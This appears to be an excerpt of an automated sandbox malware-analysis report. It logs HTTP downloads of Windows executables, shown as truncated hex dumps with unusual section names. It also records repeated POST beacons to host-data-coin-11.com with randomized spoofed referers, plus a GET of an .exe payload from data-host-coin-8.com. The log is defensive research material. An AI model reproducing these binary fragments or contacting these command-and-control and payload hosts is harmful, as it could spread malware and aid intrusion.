00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 be ea 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 00 04 00 00 18 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 75 76 00 00 00 00 05 00 00 00 00 d0 14 00 
00 02 00 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 65 7a 61 78 00 00 ea 00 00 00 00 e0 14 00 00 02 00 00 00 0a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 65 6c 65 70 61 72 93 0d 00 00 00 f0 14 00 00 0e 00 00 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 00 15 00 00 88 00 00 00 1a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5a 46 00 00 00 90 15 00 00 48 00 00 00 a2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:22 GMTContent-Type: application/x-msdos-programContent-Length: 324608Connection: closeLast-Modified: Fri, 14 Jan 2022 18:09:01 GMTETag: "4f400-5d58eb2941be5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 70 df 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f6 03 00 00 ac 11 00 00 00 00 00 a0 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 69 64 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 f0 03 00 50 00 00 00 00 10 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f4 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e f4 03 00 00 10 00 00 00 f6 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 65 72 61 76 69 63 05 00 00 00 00 e0 14 00 
00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 75 64 65 00 00 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 75 70 00 00 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 10 15 00 00 88 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 46 00 00 00 a0 15 00 00 48 00 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:54 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 18:09:59 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 17:15:09 GMTETag: "6ff1c7-5d58df1eec44d"Accept-Ranges: bytesContent-Length: 7336391Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 51 ae e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 12 0b 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:13 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:16 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 
00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 18:10:18 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 16:06:29 GMTETag: "6ff1c1-5d58cfc604e56"Accept-Ranges: bytesContent-Length: 7336385Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 cb 9e e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 25 0a 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49948 version: TLS 1.0
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sasldotps.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 160 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hvxghwlm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 347 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gvuhy.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 266 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xcewx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 166 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fuylvs.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 234 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ejshmyhdg.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 128 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fxdrjy.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 359 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pmdsi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 323 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
